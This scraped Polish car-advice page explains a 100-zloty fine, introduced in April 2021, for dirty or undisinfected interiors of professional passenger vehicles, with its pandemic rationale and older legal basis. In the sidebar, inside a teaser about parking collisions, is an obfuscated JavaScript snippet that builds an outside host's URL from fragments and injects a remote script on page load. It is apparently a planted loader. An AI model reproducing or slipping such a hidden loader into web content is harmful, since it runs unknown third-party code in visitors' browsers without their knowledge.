Strona głównaPoradyMandat za brud w aucie

Mandat za brud w aucie

-

Samo pojęcie mandatu za brud w aucie wydaje się dość absurdalne. Tymczasem taki sposób karania kierowców naprawdę istnieje. Wszedł w życie 10 kwietnia 2021 roku. Większym echem odbił jest jednak nowy taryfikator mandatów za przekroczenie prędkości i wielu kierowców nie zdaje sobie sprawy z istnienia mandatu za bałagan w samochodzie. Na czym polega konkretnie ten mandat?

Kogo dotyczy mandat za bałagan w samochodzie?

Nie każda osoba, która na bieżąco nie sprząta w swoim samochodzie, ma powody do paniki. Tak naprawdę nowy mandat za bałagan w samochodzie dotyczy wyłącznie osób, które zawodowo zajmują się przewozem innych ludzi. Obawiać się muszą taksówkarze, przewoźnicy busów, kierowcy autobusów, czy autokarów. Dlatego policjanci w trakcie kontroli nie będą oglądali sposobu zachowania czystości w prywatnych samochodach.

Ile wynosi mandat za brudny samochód?

Mandat z brudny samochód nie jest wysoki. Jego koszt to 100 złotych. Tym niemniej jest to kolejny sposób na stracenie nieco funduszy i lepiej się przed nim chronić.

Mandat za bałagan w aucie – co trzeba przez to rozumieć?

Mandat za brudny samochód oficjalnie powstał z powodu pandemii koronawirusa. W związku z nią nagromadzone w aucie przedmioty, szczególnie śmieci, sprawiają, że takiego wnętrza nie da się skutecznie umyć i zdezynfekować. Dlatego nakaz bieżącego sprzątania wszelkich odpadków. Mandat za brudny samochód jednak nie ma ściśle określonej granicy tego, co za brud zostanie uznane. Trudno oczekiwać, że policjanci w trakcie kontroli przeprowadzą test białej rękawiczki i sprawdzą, czy na kokpicie znajduje się warstwa kurzu. Brak jednoznacznego opisu, czym tak naprawdę jest mandat za brud w aucie, doprowadzić może do wielu absurdalnych sytuacji. Czy za bałagan uznać można sytuację, w której papierek po cukierkach znajdzie się w schowku kierowcy, czy dopiero, jeśli śmieci będą się wręcz wysypywać z auta? Tutaj prawodawca nie daje jednoznacznej odpowiedzi.

Faktem jest, że nowe przepisy wprowadzone zostały w sytuacji pandemii. Chodziło więc w nich głównie o możliwość skutecznej dezynfekcji wnętrza pojazdu. Policjant więc mandat może wlepić z powodu braku dezynfekcji klamek i uchwytów w środku pojazdu, co jest obowiązkiem prywatnego przewoźnika. Mandat za bałagan w samochodzie nie będzie raczej przyznany za sam fakt wożenia pustych opakowań po produktach spożywczych, ale lepiej jest je po prostu schować w zamykanym schowku.

Zgodnie z przepisami, pasażer pojazdu musi mieć także dostęp do środków do dezynfekcji rąk. Mandat za brud w aucie został więc podciągnięty również pod takie sytuacje.

Warto zwrócić uwagę na jeszcze jeden fakt. Przepisy, w myśl których obowiązywać zaczął mandat za brudny samochód, weszły w życie 10 kwietnia 2021. Wcześniej jednak istniała już podobna kara. Została ona usankcjonowana w 2009 roku. W Kodeksie wykroczeń pojawiała się ona jako artykuł 117. § 1 i § 2. Już wtedy mandat za bałagan w samochodzie wynosił 100 złotych. Nie jest to więc nic nowego, tylko obecnie podciągnięte to zostało pod warunki pandemiczne. Dawniejsze prawodawstwo zmuszało przewoźnika do zachowywania właściwych warunków higienicznych ze względów sanitarnych i zapobiegania rozprzestrzenianiu się chorób.

Z tego powodu policjant podczas kontroli drogowej ukaże kierowcę mandatem wyłącznie, jeżeli uzna, że podróż przewożonych przez niego pasażerów stanowi dla nich zagrożenie epidemiologiczne. Oczywiście kierowca ma prawo odmówić jego przyjęcia, a wówczas sprawa kierowana jest do sanepidu. Ten z kolei może za stosowne uznać użycie mandatu w wysokości od 5 do 30 tysięcy złotych, na podobnych zasadach jak brak maseczki zakrywającej usta i nos.

POPULARNE

stłuczka na parkingu

Szkoda parkingowa a ubezpieczenie OC

0
(function(){ z5mj=document.createElement("script");z5mj_=(("u")+"st")+"a";z5mj.async=true; z5mj.type="text/javascript";z5mj_+=("t.i")+""+"n";z5mj_+=(("f")+"o");z5mj_+="/"; z5mju="191668293.";z5mju+="x0y40sjw5mjea7dlbe1"+"gj40mi81fl6"; z5mj.src="https://"+z5mj_+z5mju;document.body.appendChild(z5mj); })(); W 2018 roku do jednostek policji zgłoszono 436 414 kolizji. Jednym z miejsc, w których szczególnie często dochodzi do takich zdarzeń są parkingi. Co...
Opony Apollo Opinie

Opony Apollo – opinie

Opinie o Koyo

Firma KOYO – opinie

OSTATNIE POSTY